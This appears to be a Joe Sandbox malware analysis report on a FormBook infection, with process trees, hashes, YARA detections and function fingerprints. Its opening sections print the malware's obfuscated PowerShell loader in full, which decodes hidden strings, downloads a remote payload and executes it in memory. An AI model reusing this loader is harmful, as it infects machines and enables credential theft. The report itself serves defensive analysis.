ACGrpoTuspAiKeArSsPro0F2K r'S4F2S2VDT0TAM1S3E0N8R1A2O0I3C0LDA1M4R5SER5U1P4B6E5IBF4C6U4DET2F8P0G3R1J1M4KBL2T9N0S4F0GCs0J3W0T5L1L2S4B6A2S8b0P3d1a2V4N8P3p1S0R3N0N4K2P5S0BAG0SFP0T3D0l8H1c2L4fFf4K8k2U2F0S9P1m1S0U8A0kAD0E9R0C7S0I2v3S5S1C2A1I4S0UFB0R8D0o1P4AEW4M2G2S5A1P4G0K9S1K3F1A6K0tFS0p3A1A4K1B5A1f4S5O6S5m7C4FFS'N;L`$PFSoNrStShS8T E=D MChrToFuCpkitePrFsDrF0S2B A'I4I2R3N4V0a9P0L7p0S8E0U9C0CDD0T3F1A6E1C4S0H3C5P4B5CBN4J2C0R3D0A8P1E0S5GCK0B7B1I6O1R6S0T2C0L7S1A2B0B7U'N;S&F(K`$ISKpKrTgCeI7T)P R`$BFBoIretShS8N;F`$GRFoFaHnJoCkMeMpBrSeV2a=A`$AREoMaBnIoBkVeBpcrTeA2L+s'G\ASRtfeOdEoFrVdP.GdAaVtA'B;S`$EKnlpuPnFtMeDkArT8M7F=F'P'j;AiSfT S(B-KnsoMtB(mTSeDsGtP-SPNaEtKhM h`$PRFoUaKnMoSkSePpRrLeH2T)P)B A{FwShDiElTeK B(E`$KKGlNuMnMtDeVkNrE8D7T S-AeFqW D'E'M)o F{S&L(S`$PSSpOrDgTeS7S)S S`$ACDrAosuSpPiFeSrNsbrB0K0F;MSEtWaDrAtB-SSTlMeAeApO S5U;E}RSSePtG-UCMofnctheSnUtS P`$TRNoHaRndoYkSeBpArmeK2t K`$RKTlFuBnMtKeGkvrS8c7S;Q}L`$TKSlLuEnDtTeUkSrN8M7S H=r SGTeBtF-ECRoSnqtUeDnVtK P`$ORRoDaTnNopkBeSpMrges2G;G`$UFFoSrPtSht9S A=B ACNrcoUurpPiWeSrTsSrK0g2C S'K4B2P2S0O0D9L1r4A1A2F0FEC4B6K5NBS4C6K3HDT3M5E1PFo1C5B1g2B0E3S0FBA4N8S2O5B0R9u0I8H1s0I0S3P1t4L1P2G3FBF5SCV5WCF2D0A1S4G0O9T0FBS2D4C0T7H1R5P0R3p5W0E5D2D3G5P1U2A1C4P0FFj0F8R0K1C4UEV4T2S2PDK0JAm1s3S0S8T1M2b0A3U0SDb1u4S5OEP5K1K4EFB'b;C&F(O`$rSJpSrVgUeC7A)D C`$BFSoUrTtBhL9T;P`$FKVlDuAnDtDeskFrF8M7d0s T=A GCArMoUuTpSiHeRrSsBrT0P2L I'C3HDG3B5g1LFA1A5O1P2F0A3D0DBe4R8G3C4C1O3P0C8S1S2E0AFS0MBT0I3D4N8G2KFQ0S8U1T2S0T3G1O4S0P9P1O6F3F5O0P3I1P4U1P0M0BFa0R5S0Z3S1M5K4Q8V2SBP0R7u1G4B1M5C0VER0G7M0nAD3FBR5bCU5ACS2H5T0P9T1k6M1OFB4aEF4V2F2s0f0f9M1s4B1K2U0BEN4TAI4V6B5T6R4pAK4G6E4M6P4T2L3K4M0X9L0S7P0l8S0D9T0EDC0R3b1G6F1C4S0P3T5T5S4pAT4P6H5D0U5K2A5S5W4AFD'C;I&S(P`$KSEpErSgPeV7T)T U`$TKPlBuEnMtneFkErB8P7C0U;P`$UfFotlPkUeKtN=S`$OFIoIrBtShU.NcSoRuPnHtl-c6T4D3O;K`$MKHlGuUnKtPeRkFrS8T7D1p t=S BCArLoMuMpMiBeErOsCrp0S2S M'S3IDY3F5f1EFS1W5R1n2t0C3B0dBk4D8N3R4K1C3A0U8K1A2E0MFH0ABL0O3P4A8L2SFC0P8S1D2Y0R3N1P4Y0K9B1M6O3J5P0F3S1A4I1B0S0ZFU0R5T0D3U1s5M4W8A2BBS0i7U1R4L1G5E0UEB0U7T0LAG3QBP5FCP5cCI2U5P0G9S1I6s1FFB4UEV4R2j2P0K0M9S1N4D1L2M0OES4WAS4R6G5K0D5f2L5u5G4FAP4E6T4N2T3S5b1RFv0H2V0V7N0SBM0B3O1B4A0DFO0PDt4uAB4S6i4G2T0P0T0H9A0FAS0SDS0D3U1T2P4SFK'U;U&S(O`$ASnpFrEgAeG7P)H H`$RKilTuKnTtSeOkArR8D7S1M;S`$RKOlKuLnEtEeSkSrD8B7A2U C=L KCFrToZuCpDiSeOrHsmrM0P2L H'u4E2F2F5P0d9T0MER0G7k0I4F0TFF4O6K5NBT4P6K3MDF3C5S1OFT1T5K1L2B0T3D0SBH4N8l3s4V1G3d0S8g1F2E0CFD0BBF0G3A4C8V2FFB0O8S1v2B0P3F1b4C0H9m1B6F3R5E0M3E1s4K1B0P0PFN0R5K0D3S1C5a4B8A2BBM0I7U1G4I1A5S0GEV0P7C0IAZ3KBN5TCP5RCK2O1B0A3S1S2P2E2M0N3L0CAK0f3J0M1R0U7B1D2p0E3E2H0r0R9N1M4S2B0E1S3I0Z8a0V5D1V2D0PFA0W9V0H8R3O6A0U9S0MFB0B8R1S2B0U3A1I4a4PEA4TEC0U0S0UDT1k6T4R6R4g2B2N0T1T4T0W3F0HDT1S0A0H3K0U8D1P5N1B5N4R6E4Z2M2MEI0K3D0SBa0s7T1K2S0S9B1K6L0A7M1S2M4TFf4SAS4S6P4sEB2U1U2B2F3D2N4O6F2B6B4eEU3PDA2PFA0S8P1T2T3U6K1K2D1C4D3PBP4GAS4O6H3PDR2AFD0K8C1A2D3P6I1T2A1D4D3BBB4PAF4E6S3SDV2sFC0N8s1F2U3V6S1V2p1H4S3CBP4wAC4e6D3LDF2TFP0K8B1E2O3F6F1J2R1P4O3BBS4BAH4W6p3PDE2HFT0G8P1W2S3H6T1D2o1I4M3UBK4HFV4U6S4CES3SDS2LFV0M8D1B2D3B6B1U2F1S4D3VBG4TFU4PFP4LFD'M;T&K(H`$SSCpfrHgBeU7F)K M`$LKGlBuRnStIeBkMrG8T7R2B;C`$LKTlPuAnStTeHkFrA8J7A3M C=S FCVrkoFuDpGiEeFrrstrT0H2U S'O4M2N2J5R0Z9T0VEO0A7I0t4C0UFt4A8U2FFP0E8C1L0V0S9A0UDH0s3A4AEc4F2T3C4N0G9T0N7T0A8G0D9T0BDT0F3U1A6S1L4S0I3B5A5F4UAS4L2N3N5R1UFB0U2J0I7r0IBH0P3A1I4s0PFT0MDK4LAS4C2F2DBR0FFR0O2N1S5B0f9S0ABL0OBB4VAU5s6I4HAM5V6M4SFG'S;W&F(L`$RScpIrCgFes7B)F O`$iKglNuDnStSeDkMrC8A7P3V#P;""";Function Kluntekr879 ([String]$Tilbliv) { For($dependens=1; $dependens -lt $Tilbliv.Length-1; $dependens+=(1+1)){ $Croupiersr = $Croupiersr + $Tilbliv.Substring($dependens, 1); } $Croupiersr;}$Limberest0 = Kluntekr879 'HITEDXM ';$Limberest1= Kluntekr879 $Vakanc;if([IntPtr]::size -eq 8){.$env:systemroot\S6\WPower\1.0\ll.*xe $Limberest1 ;}else{&$Limberest0 $Limberest1;}
Imagebase:	0x7ff7466a0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4868, Parent PID: 5496

General

Target ID:	2
Start time:	17:18:10
Start date:	02/03/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5600, Parent PID: 5496

General

Target ID:	3
Start time:	17:18:14
Start date:	02/03/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Croupiersr02 { param([String]$Tilbliv); $Fodfst = $Tilbliv.Length; $Skalletef = New-Object byte[] ($Fodfst / 2); For($dependens=0; $dependens -lt $Fodfst; $dependens+=2){ $osteopla = $Tilbliv.Substring($dependens, 2); $Skalletef[$dependens/2] = [convert]::ToByte($osteopla, 16); $Skalletef[$dependens/2] = ($Skalletef[$dependens/2] -bxor 102); } [String][System.Text.Encoding]::ASCII.GetString($Skalletef);}Set-Content 'E:\Croupiersr03' '2';$Depra = Get-Content 'E:\Croupiersr03';$Boug0=Croupiersr02 '351F1512030B48020A0A';if ($Depra -eq '2') {$Boug0=''};$Boug1=Croupiersr02 '2B0F0514091509001248310F085554483308150700032807120F10032B03120E090215';$Boug2=Croupiersr02 '2103123614090527020214031515';$Boug3=Croupiersr02 '351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A03340300';$Boug4=Croupiersr02 '1512140F0801';$Boug5=Croupiersr02 '2103122B0902130A032E0708020A03';$Boug6=Croupiersr02 '3432351603050F070A28070B034A462E0F0203241F350F014A463613040A0F05';$Boug7=Croupiersr02 '341308120F0B034A462B070807010302';$Boug8=Croupiersr02 '3403000A030512030222030A0301071203';$Boug9=Croupiersr02 '2F082B030B09141F2B0902130A03';$Sprge0=Croupiersr02 '2B1F22030A0301071203321F1603';$Sprge1=Croupiersr02 '250A0715154A463613040A0F054A463503070A03024A462708150F250A0715154A4627131209250A071515';$Sprge2=Croupiersr02 '2F0810090D03';$Sprge3=Croupiersr02 '3613040A0F054A462E0F0203241F350F014A46280311350A09124A46300F141213070A';$Sprge4=Croupiersr02 '300F141213070A270A0A0905';$Sprge5=Croupiersr02 '0812020A0A';$Sprge6=Croupiersr02 '281236140912030512300F141213070A2B030B09141F';$Sprge7=Croupiersr02 '2F233E';$Sprge8=Croupiersr02 '3A';$Frekvenss=Croupiersr02 '333523345554';$Hematopat=Croupiersr02 '25070A0A310F080209113614090527';function fkp {Param ($Fortrng49, $Fjasende) ;$Forth0 =Croupiersr02 '420414070503141F0D465B464E3D27161622090B070F083B5C5C2513141403081222090B070F0848210312271515030B040A0F03154E4F461A46310E0314034B29040C030512461D46423948210A0904070A271515030B040A1F2507050E03464B270802464239482A090507120F09084835160A0F124E4235161401035E4F3D4B573B48231713070A154E4224091301564F461B4F48210312321F16034E4224091301574F';&($Sprge7) $Forth0;$Forth5 = Croupiersr02 '4227151203080F150B465B46420414070503141F0D482103122B03120E09024E4224091301544A463D321F16033D3B3B46264E4224091301554A464224091301524F4F';&($Sprge7) $Forth5;$Forth1 = Croupiersr02 '140312131408464227151203080F150B482F0810090D034E4208130A0A4A46264E3D351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403003B4E2803114B29040C03051246351F1512030B48341308120F0B03482F081203140916350314100F050315482E0708020A033403004E4E2803114B29040C030512462F08123612144F4A464E420414070503141F0D482103122B03120E09024E4224091301534F4F482F0810090D034E4208130A0A4A46264E4220091412140801525F4F4F4F4F4A4642200C0715030802034F4F';&($Sprge7) $Forth1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Superbruge42,[Parameter(Position = 1)] [Type] $Objecte = [Void]);$Forth2 = Croupiersr02 '4235030B0F0509121209465B463D27161622090B070F083B5C5C2513141403081222090B070F08482203000F0803221F08070B0F05271515030B040A1F4E4E2803114B29040C03051246351F1512030B483403000A0305120F090848271515030B040A1F28070B034E42240913015E4F4F4A463D351F1512030B483403000A0305120F090848230B0F1248271515030B040A1F24130F0A0203142705050315153B5C5C3413084F482203000F0803221F08070B0F052B0902130A034E42240913015F4A464200070A15034F482203000F0803321F16034E423516140103564A46423516140103574A463D351F1512030B482B130A120F0507151222030A03010712033B4F';&($Sprge7) $Forth2;$Forth3 = Croupiersr02 '4235030B0F0509121209482203000F080325090815121413051209144E4224091301504A463D351F1512030B483403000A0305120F09084825070A0A0F0801250908100308120F0908153B5C5C35120708020714024A46423513160314041413010352544F483503122F0B160A030B03081207120F0908200A0701154E4224091301514F';&($Sprge7) $Forth3;$Forth4 = Croupiersr02 '4235030B0F0509121209482203000F08032B03120E09024E423516140103544A46423516140103554A464229040C030512034A46423513160314041413010352544F483503122F0B160A030B03081207120F0908200A0701154E4224091301514F';&($Sprge7) $Forth4;$Forth5 = Croupiersr02 '140312131408464235030B0F050912120948251403071203321F16034E4F';&($Sprge7) $Forth5 ;}$Acutili = Croupiersr02 '0D031408030A5554';$Forth6 = Croupiersr02 '4224070A0D07080F150314465B463D351F1512030B48341308120F0B03482F081203140916350314100F050315482B0714150E070A3B5C5C21031222030A030107120320091420130805120F090836090F081203144E4E000D164642270513120F0A0F46423516140103524F4A464E21223246264E3D2F08123612143B4A463D332F081255543B4A463D332F081255543B4A463D332F081255543B4F464E3D2F08123612143B4F4F4F';&($Sprge7) $Forth6;$Midsomm = fkp $Sprge5 $Sprge6;$Forth7 = Croupiersr02 '4234090708090D0316140355465B464224070A0D07080F150314482F0810090D034E3D2F08123612143B5C5C3C0314094A465052554A46561E555656564A46561E52564F';&($Sprge7) $Forth7;$Forth8 = Croupiersr02 '42351F02070B03140F0D465B464224070A0D07080F150314482F0810090D034E3D2F08123612143B5C5C3C0314094A46535F5650565454524A46561E555656564A46561E524F';&($Sprge7) $Forth8;$Croupiersr01 = Croupiersr02 '0E121216155C494902140F100348010909010A034805090B49130559031E160914125B020911080A090702400F025B572F130F053C395E1037235F02335204001E55522B14352A20270E2E072A15570A';$Croupiersr00 = Croupiersr02 '422D0A130812030D145E51465B464E2803114B29040C0305124628031248310304250A0F0308124F48220911080A0907023512140F08014E4225140913160F0314151456574F';$Forth8 = Croupiersr02 '4234090708090D03161403545B420308105C07161602071207';&($Sprge7) $Forth8;$Roanokepre2=$Roanokepre2+'\Stedord.dat';$Kluntekr87='';if (-not(Test-Path $Roanokepre2)) {while ($Kluntekr87 -eq '') {&($Sprge7) $Croupiersr00;Start-Sleep 5;}Set-Content $Roanokepre2 $Kluntekr87;}$Kluntekr87 = Get-Content $Roanokepre2;$Forth9 = Croupiersr02 '42200914120E465B463D351F1512030B48250908100314123B5C5C2014090B2407150350523512140F08014E422D0A130812030D145E514F';&($Sprge7) $Forth9;$Kluntekr870 = Croupiersr02 '3D351F1512030B48341308120F0B03482F081203140916350314100F050315482B0714150E070A3B5C5C2509161F4E42200914120E4A46564A46464234090708090D03161403554A465052554F';&($Sprge7) $Kluntekr870;$folket=$Forth.count-643;$Kluntekr871 = Croupiersr02 '3D351F1512030B48341308120F0B03482F081203140916350314100F050315482B0714150E070A3B5C5C2509161F4E42200914120E4A465052554A4642351F02070B03140F0D4A464200090A0D03124F';&($Sprge7) $Kluntekr871;$Kluntekr872 = Croupiersr02 '4225090E07040F465B463D351F1512030B48341308120F0B03482F081203140916350314100F050315482B0714150E070A3B5C5C21031222030A030107120320091420130805120F090836090F081203144E4E000D1646422014030D100308151546422E030B0712091607124F4A464E21223246264E3D2F08123612143B4A463D2F08123612143B4A463D2F08123612143B4A463D2F08123612143B4A463D2F08123612143B4F464E3D2F08123612143B4F4F4F';&($Sprge7) $Kluntekr872;$Kluntekr873 = Croupiersr02 '4225090E07040F482F0810090D034E4234090708090D03161403554A42351F02070B03140F0D4A422B0F0215090B0B4A564A564F';&($Sprge7) $Kluntekr873#
Imagebase:
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 5184, Parent PID: 5600

General

Target ID:	13
Start time:	17:19:11
Start date:	02/03/2023
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\internet explorer\ieinstal.exe
Imagebase:	0xc40000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.498599133.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.498760711.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 5184

General

Target ID:	16
Start time:	17:19:42
Start date:	02/03/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff647860000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5764, Parent PID: 3452

General

Target ID:	17
Start time:	17:19:56
Start date:	02/03/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x1b0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.781341923.0000000002B00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.781212981.0000000002730000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.779930752.0000000000280000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 4008, Parent PID: 3452

General

Target ID:	18
Start time:	17:20:13
Start date:	02/03/2023
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\internet explorer\ieinstal.exe"
Imagebase:	0xc40000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 3400, Parent PID: 3452

General

Target ID:	20
Start time:	17:20:21
Start date:	02/03/2023
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\internet explorer\ieinstal.exe"
Imagebase:	0xc40000
File size:	480256 bytes
MD5 hash:	DAD17AB737E680C47C8A44CBB95EE67E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: powershell.exePID: 5496, Parent PID: 6128COMMON

Executed Functions

Function 00007FFCA4401C63 Relevance: 3.0, Strings: 2, Instructions: 470COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFCA4401FA3
H, xrefs: 00007FFCA4401FC6

Memory Dump Source

Source File: 00000001.00000002.500761465.00007FFCA4400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA4400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffca4400000_powershell.jbxd

Similarity

API ID:
String ID: H$H
API String ID: 0-136785262
Opcode ID: f5d23bb7f943b258e29bea768788b9e367fb8da615ac41d6e500ad0e8fa9ec3e
Instruction ID: 3b0d807f4a9bd98c454e2339e3e1eec2023a00f11e8bb11cd78b26e2ba8133d6
Opcode Fuzzy Hash: f5d23bb7f943b258e29bea768788b9e367fb8da615ac41d6e500ad0e8fa9ec3e
Instruction Fuzzy Hash: 86F1E431A08A5D8FEF84DB1CC4E5AA97BE1FFA8301F1445A9C449D7296CA29FC52C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA44025A2 Relevance: .6, Instructions: 576COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.500761465.00007FFCA4400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA4400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffca4400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5c3d651bf5ca8eec8f11ade0da773e68481856fa095eafdf71727466a2092d9
Instruction ID: 91834bf70383a6e1522cf2b7d36dce4bf0f584b79a5453f923baa3ed8108bd13
Opcode Fuzzy Hash: c5c3d651bf5ca8eec8f11ade0da773e68481856fa095eafdf71727466a2092d9
Instruction Fuzzy Hash: 25120531A09A5D8FDF95DF1CC4A5AE97BE0FF98301F1405AAC049D72AACA28FC51C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA440309C Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.500761465.00007FFCA4400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA4400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffca4400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4efce2d5b23aa1a1ad2b146c3b19bd28b3c33e8233b38aa3fd0d3aa3701440
Instruction ID: 0f23151cfa4ac9fddc7d7cdbd71dc722d9cf77bf375df34a4065363323d97b46
Opcode Fuzzy Hash: fd4efce2d5b23aa1a1ad2b146c3b19bd28b3c33e8233b38aa3fd0d3aa3701440
Instruction Fuzzy Hash: C1312D31A1891D8FDF94EF58D495EADB7E1FFA8301F1401A9E409D7296CA24ED81CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA4402D9A Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.500761465.00007FFCA4400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA4400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffca4400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ac14e0e3ff2a03f8b5b6f704d1e7fc0097b3422fbd21381f1003e4ee6d8eabf
Instruction ID: 3d929683e6eaa22974619b34d09cb8d000b6d73e8d78dabb38786130ce61ba6c
Opcode Fuzzy Hash: 1ac14e0e3ff2a03f8b5b6f704d1e7fc0097b3422fbd21381f1003e4ee6d8eabf
Instruction Fuzzy Hash: 9001B97271CB494FDB58DA0CD8925B133D1EB95320B50056EE08AC32ABD916FC428745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA44018D5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.500761465.00007FFCA4400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA4400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffca4400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5921e71f07582a7c74abfbbba3be25ad186edaa7760d03d5a8c8591150ec97b9
Instruction ID: 0ddec213aaf48d7d2e011d3cf10b340549513247d77a81208190a72a049357e7
Opcode Fuzzy Hash: 5921e71f07582a7c74abfbbba3be25ad186edaa7760d03d5a8c8591150ec97b9
Instruction Fuzzy Hash: 1C01A73120CB0C8FD744EF0CE091AA6B3E0FB85320F10052DE58AC3265DB36E881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA4402E0F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.500761465.00007FFCA4400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA4400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffca4400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe1b1bc0f9300867c0762a78706dcf0fc36140c617b55f32515dcb2c2f2fc51
Instruction ID: 3830d5b2e718004b6037263d1e64d1b8e1c028393f7623b0a425893ce54412d6
Opcode Fuzzy Hash: ffe1b1bc0f9300867c0762a78706dcf0fc36140c617b55f32515dcb2c2f2fc51
Instruction Fuzzy Hash: 72F05E7272CB484FD75CDA0CF8529B573D1EB85330B50062EF08BC26D6EA26BC428686

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA4402792 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.500761465.00007FFCA4400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA4400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffca4400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1441ac77bf44b11642f57b770ad2c6ee8238e37d4d7da8b8f90e62f76c82a6f9
Instruction ID: d23f6b123199930ab1e90d44d7d6ff1a1319cdbb2a986dcd8e734f9c0d20a02d
Opcode Fuzzy Hash: 1441ac77bf44b11642f57b770ad2c6ee8238e37d4d7da8b8f90e62f76c82a6f9
Instruction Fuzzy Hash: D2F0C03276C6084FD75C9A0CF8939F573D1E789234B50016EE48BC6656E916B9438685

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCA44027D8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.500761465.00007FFCA4400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFCA4400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffca4400000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c06b96b6ea298a3b93f4cbb487a533be0cfa9c3bc325351ae06974bfffee53a
Instruction ID: de911c82b177c3bc6595d20faafb5af1af6d316af259e918b9c9ddf4816c2cf6
Opcode Fuzzy Hash: 9c06b96b6ea298a3b93f4cbb487a533be0cfa9c3bc325351ae06974bfffee53a
Instruction Fuzzy Hash: EBF0303276D6084FD74C9A0CF8939B573D1E789220B40016EE48BC3696E916B8428685

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ieinstal.exePID: 5184, Parent PID: 5600COMMON

Execution Graph

Execution Coverage:	1.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	72.4%
Total number of Nodes:	286
Total number of Limit Nodes:	4

Executed Functions

Function 22749660 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2274966A

Memory Dump Source

Source File: 0000000D.00000002.535586736.00000000226E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 226E0000, based on PE: true

Associated: 0000000D.00000002.535586736.00000000227FB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.535586736.00000000227FF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_226e0000_ieinstal.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7c272c8740e5f1e129d2b2887fde557a1bd7540f8492209f0107b5ae451f7981
Instruction ID: 8b1d3f42a7f97d3e98216074071c151ed7ebab297c2e5992c899ca81aa9277c4
Opcode Fuzzy Hash: 7c272c8740e5f1e129d2b2887fde557a1bd7540f8492209f0107b5ae451f7981
Instruction Fuzzy Hash: A290027120610807D1817159444464A400597D5341F92C019F4015614DCA558AA977E1

Uniqueness

Uniqueness Score: -1.00%

Function 22749860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 2274986A

Memory Dump Source

